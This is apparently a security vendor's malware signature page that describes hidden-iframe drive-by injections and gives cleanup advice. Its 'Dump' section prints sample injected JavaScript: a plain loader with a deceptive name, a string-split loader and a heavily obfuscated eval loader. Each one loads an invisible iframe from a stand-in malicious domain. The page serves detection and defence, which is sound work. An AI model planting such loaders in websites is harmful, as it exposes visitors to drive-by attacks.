Malware Signatures

  1. Home
  2. Malware Signatures
  3. js.malware.hidden-iframe.005

js.malware.hidden-iframe.005

Hidden IFRAME is one of the most common malware type. Most drive-by malware infections rely on iframes. When visitors load a legitimate web sites,
an invisible iframe loads a malicious payload from a third-party site that silently attacks the visitors computer. Iframe code itself is straight forward
and webmasters can easily identify where they load their content from and whether they belong to the site or not. That's why hackers usually obfuscate
iframes injecting them using a hard-to-read JavaScript. Most modern websites use lots of legitimate scripts and webmasters usually don't completely understand
what they do, so they are more likely to leave them without a proper insection.

Affecting

Any website

Cleanup

You need to identify all infected files and remove malicious scripts from them. Then you should identify an close the security hole.
You can sign up with us and let our team remove the malware for you.

Dump

... Script code can be straight forward but with deceptive function and variable names ...

function showBrowVer()
{
var data = browserDetectNav();

if (data[0]) {
if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){
var divTag=document.createElement('div');
divTag.id='dt';
document.body.appendChild(divTag);
var js_kod2 = document.createElement('iframe');
js_kod2.src = 'http://malicious-domain.com/?2';
js_kod2.width = '5px';
js_kod2.height = '3px';
js_kod2.setAttribute('style','visibility:hidden');
document.getElementById('dt').appendChild(js_kod2);
}
}
}
....

... slightly obfuscated ...

var tds_url = 'ht' + 'tp:' + '//' + 'xx.' + 'xxx.' + 'xx.' + 'xxx' + '/';
var group = '?' + 'i' + 'd' + '=' + '1';
var charset = 'utf-8';
var referer = encodeURIComponent(document.referrer);
var url = tds_url + '/' + group + '&se_referer=' + referer + '&charset=' + charset;
document.write('<' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + ' ' + 'w' + 'i' + 'd' + 't' + 'h' + '=' + '"' + '0' + '"' + ' ' + 'h' + 'e' + 'i' + 'g' + 'h' + 't' + '=' + '"' + '0' + '"' + ' ' + 'f' + 'r' + 'a' + 'm' + 'e' + 'b' + 'o' + 'r' + 'd' + 'e' + 'r' + '=' + '"' + '0' + '"' + ' ' + 's' + 'c' + 'r' + 'o' + 'l' + 'l' + 'i' + 'n' + 'g' + '=' + '"' + 'n' + 'o' + '"' + ' ' + 's' + 'r' + 'c' + '="' + url + '">' + '<' + '/' + 'i' + 'f' + 'r' + 'a' + 'm' + 'e' + '>');

... or heavily obfuscated ...

/*fe9ee021ca8b75385556d8588e76ae28*/try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["3o","4d","46","3l","4c","41","47","46","16","3p","4a",... skipped ...,"2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}/*fe9ee021ca8b75385556d8588e76ae28*/

which decodes to (not comlete code):

document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://malicious-domain.org/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>')
...